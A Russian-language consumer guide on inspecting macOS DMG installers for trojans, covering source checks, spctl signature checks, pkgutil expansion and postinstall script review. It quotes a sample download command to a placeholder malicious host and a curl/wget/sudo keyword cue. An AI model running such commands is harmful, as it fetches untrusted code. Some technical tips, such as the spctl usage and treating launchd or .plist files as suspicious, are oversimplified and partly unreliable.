Как проверить установщик macOS (DMG) на наличие трояна перед установкой

Как проверить установщик macOS (DMG) на наличие трояна перед установкой

Ты скачал DMG-файл — может быть, это новая версия Photoshop, редактор видео, или даже бесплатная утилита из незнакомого сайта. Ты хочешь установить её, но что-то внутри тебя шепчет: «А вдруг это зараза?» — и это правильно. В 2024 году трояны на macOS — не миф. Они не так часто встречаются, как на Windows, но когда попадаются — их сложно заметить, пока не станет слишком поздно. Ты не хочешь, чтобы твои пароли, фото, документы или доступ к банковскому приложению оказались у кого-то ещё. Давай разберёмся, как проверить DMG-файл, чтобы не стать жертвой.

Почему DMG — это не просто «файл для установки»

DMG — это не архив, как ZIP. Это образ диска. Когда ты открываешь его в Finder, macOS монтирует его как виртуальный диск. Внутри может быть:

• Просто приложение (.app) — безопасно, если источник проверен.
• Установщик с запускаемым скриптом (.pkg, .sh, .app) — уже опаснее.
• Скрытые файлы, запускаемые при первом запуске — вот где прячутся трояны.

Ты не видишь, что происходит за кулисами. Даже если файл выглядит как «Photoshop.dmg», внутри может быть скрипт, который в фоне:

• Крадёт файлы из папки ~/Documents;
• Устанавливает фоновый процесс, который слушает команды с удалённого сервера;
• Отправляет твои данные в Telegram-бота, который ты даже не подозреваешь, что существует.

И всё это может выглядеть как «установка завершена — запустите приложение». Никаких предупреждений. Никаких ошибок. Только тишина — и твои данные в чужих руках.

Шаг 1: Проверь источник — это самое важное

Если ты скачал DMG с сайта, которого не знаешь — остановись. Даже если он выглядит как официальный. В 2023 году был случай: троян под названием «CleanMyMac Pro» распространялся через сайт, который копировал дизайн MacPaw. Даже URL был почти идентичен — только одна буква отличалась. Ты не увидишь разницу, если не смотришь внимательно.

Что делать:

1. Проверь, откуда ты скачал файл. Только официальный сайт разработчика? Домен совпадает с тем, что указан в App Store или на их официальном Twitter/Instagram?
2. Если это неофициальный источник — например, форум, Telegram-канал, торрент — откажись. Даже если там «все говорят, что работает».
3. Если ты не уверен — найди приложение в App Store. Там Apple проверяет все публикации. Да, там не всё есть, но безопасность выше.

Если ты скачал файл с сайта, который не доверяешь — не открывай его. Просто удали. Не трати время на проверки. Риск не стоит усилий.

Шаг 2: Проверь цифровую подпись — это твой первый технический щит

Качественные разработчики подписывают свои установщики цифровой подписью. Это как печать на конверте — ты знаешь, кто его отправил, и что его не меняли после отправки.

Как проверить подпись:

1. Открой Терминал (Finder → Приложения → Утилиты → Терминал).
2. Перетащи файл DMG в окно Терминала — появится путь к файлу.
3. Добавь в начало команду: spctl -a -v и нажми Enter.

Пример:

spctl -a -v /Users/alex/Downloads/Photoshop.dmg

Если ты увидишь:

• accepted — всё хорошо. Подпись валидна.
• rejected — файл не подписан или подпись повреждена. Опасно.
• no suitable identity found — подпись отсутствует. Неизвестный источник.

Почему это важно? Apple не позволяет приложениям без подписи запускаться на новых версиях macOS без ручного разрешения. Но трояны могут обойти это, если они в DMG с «другим» содержимым — например, скриптом, который запускается до приложения. Поэтому подпись — это не панацея, но первый фильтр.

Шаг 3: Не открывай DMG — сначала проверь содержимое

Ты не должен просто дважды кликнуть по DMG и ждать, пока macOS всё сама сделает. Это как открыть конверт без проверки, что внутри — письмо или бомба.

Правильный способ:

1. В Finder найди скачанный DMG-файл.
2. Не кликай по нему. Щёлкни правой кнопкой → «Показать содержимое пакета» (если это .app) или просто дважды кликни, чтобы смонтировать — но не запускай ничего.
3. Открой монтированный диск в Finder. Что ты видишь?

Типичные безопасные структуры:

• Один файл .app — можно перетащить в папку Applications.
• Файл .app + README.txt — тоже нормально.

Опасные признаки:

• Файл .pkg — установщик, который может запускать скрипты от имени системы.
• Файл .sh, .py, .command — скрипты. Если ты не знаешь, что это за код — не запускай.
• Скрытые файлы: .DS_Store — это нормально, но .hidden, .plist, .dylib — подозрительно.
• Несколько приложений или «установщики» в одной папке — это не стандартно.

Если ты видишь .pkg — не кликай. Открой его в Терминале:

pkgutil --expand /путь/к/файлу.pkg /tmp/pkg-extract

Затем зайди в /tmp/pkg-extract и посмотри, что внутри. Есть ли файлы с именами вроде postinstall или preinstall? Это скрипты, которые запускаются с правами администратора. Открой их в TextEdit — если там что-то вроде curl http://malicious.site/download — это троян. Удаляй всё.

Что делать, если ты не понимаешь, что внутри

Не все знают, как читать скрипты. Не беда. Есть простой способ — использовать бесплатный инструмент.

Утилита: XtraFinder (опционально) — добавляет в Finder возможность просмотра скрытых файлов. Но ты можешь сделать то же самое без него:

• В Терминале введи: defaults write com.apple.finder AppleShowAllFiles YES
• Затем: killall Finder

Теперь в Finder ты увидишь все скрытые файлы. Ищи файлы, которые:

• Начинаются с точки — .bashrc, .zshrc, .config
• Имеют расширение .plist — особенно в папке ~/Library/LaunchAgents/ (если ты их видишь в DMG — это тревожный знак)
• Имеют странные имена: update.sh, cleaner.command, license.dmg

Если ты видишь что-то подозрительное — не запускай. Удали DMG. Забудь про это приложение.

Таблица: Что безопасно, а что — троян

Сценарии: Что делать в разных ситуациях

Ситуация 1: Ты скачал «Free Adobe Photoshop» с сайта, который не знаешь
→ Не открывай. Удали. Никаких проверок. Это 99% троян. Купи лицензию или используй бесплатные альтернативы (Affinity Photo, GIMP).

Ситуация 2: Ты скачал .dmg с GitHub от разработчика, у которого 200 звёзд и 50 коммитов
→ Проверь подпись через spctl. Посмотри, что внутри — один .app? Нет скриптов? Отлично. Установи. Если есть .pkg — распакуй и посмотри postinstall. Если там только копирование файлов — возможно, безопасно. Если есть curl или sudo — не трогай.

Ситуация 3: Ты скачал DMG от знакомого, который сказал: «Тут крутой инструмент для работы с PDF»
→ Спроси: «Откуда ты его взял?» Если он не знает — не запускай. Если он скачал с официального сайта — проверь подпись и содержимое. Если он сам собрал — попроси исходный код. Без этого — не доверяй.

Ситуация 4: Ты скачал DMG с App Store — и он запускается, но странно себя ведёт
→ App Store — не 100% защита. Бывают случаи, когда приложение «запускает» вредоносный скрипт после установки. Проверь его в Мониторинге активности (Activity Monitor). Ищи процессы с именами вроде systemupdate, launchd, com.apple.something — но с нестандартными цифрами. Если что-то подозрительное — удали приложение и сообщи Apple через Feedback Assistant.

Частые ошибки

1. «Я открыл DMG — всё выглядит нормально» — Внешний вид не значит безопасность. Трояны могут быть в скрытых файлах или запускаться только при первом запуске приложения.
2. «Я отключил Gatekeeper — теперь всё работает» — Это как снять замок с двери. Ты не защитил себя — ты просто убрал барьер. Троян теперь может работать без предупреждений.
3. «Я скачал с сайта, который выглядит как Apple» — Проверь URL. Официальный сайт Apple — apple.com. Всё остальное — подделка, даже если там логотип и шрифт.
4. «Я запустил только приложение — скрипты не запустились» — Некоторые трояны запускаются при первой загрузке системы, а не при открытии приложения. Ты можешь не заметить, пока не пройдёт 2–3 дня.
5. «Я проверил антивирусом — всё чисто» — Большинство антивирусов для macOS не умеют находить трояны, которые работают как легитимные процессы. Они ищут только известные вредоносные сигнатуры. А новые — нет.

Как лучше сделать — практические рекомендации

Вот твой чек-лист перед установкой любого DMG:

1. Источник — только официальный сайт или App Store. Никаких «скачать бесплатно».
2. Проверь подпись — spctl -a -v /путь/к/файлу.dmg. Если не accepted — не запускай.
3. Не открывай сразу — сначала посмотри содержимое. Ищи .pkg, .sh, .command, скрытые файлы.
4. Если есть .pkg — распакуй его через pkgutil --expand и посмотри скрипты. Если там есть команды с curl, wget, sudo — удали.
5. После установки — открой Мониторинг активности. Ищи новые процессы, которые не связаны с приложением. Смотри на «Потребление CPU» и «Сеть».
6. Если сомневаешься — не устанавливай. Найди альтернативу. Есть ли это в App Store? Есть ли аналог на GitHub с хорошей репутацией?

Помни: безопасность — это не про то, что ты сделал «всё правильно». Это про то, что ты не сделал то, что могло бы тебя сломать.

Итог: Что делать прямо сейчас

Если ты только что скачал DMG — не запускай его. Не открывай. Не кликай. Сделай следующее:

• Проверь источник. Если не уверен — удали.
• Если источник надёжный — открой Терминал и введи spctl -a -v /путь/к/файлу.dmg.
• Если подпись в порядке — открой DMG, но не запускай ничего. Посмотри, что внутри.
• Если видишь только .app — перетащи его в Applications. Готово.
• Если видишь .pkg, .sh, .command — не трогай. Удали DMG.

Если ты всё проверил — и ничего подозрительного нет — ты в безопасности. Если ты не уверен — не устанавливай. Есть тысячи других программ. Ты не обязан устанавливать всё, что тебе предложили. Лучше потерять один инструмент, чем всю свою цифровую жизнь.

Информация в этой статье носит ознакомительный характер. При работе с файлами, особенно из непроверенных источников, всегда консультируйся с IT-специалистом, если сомневаешься в безопасности.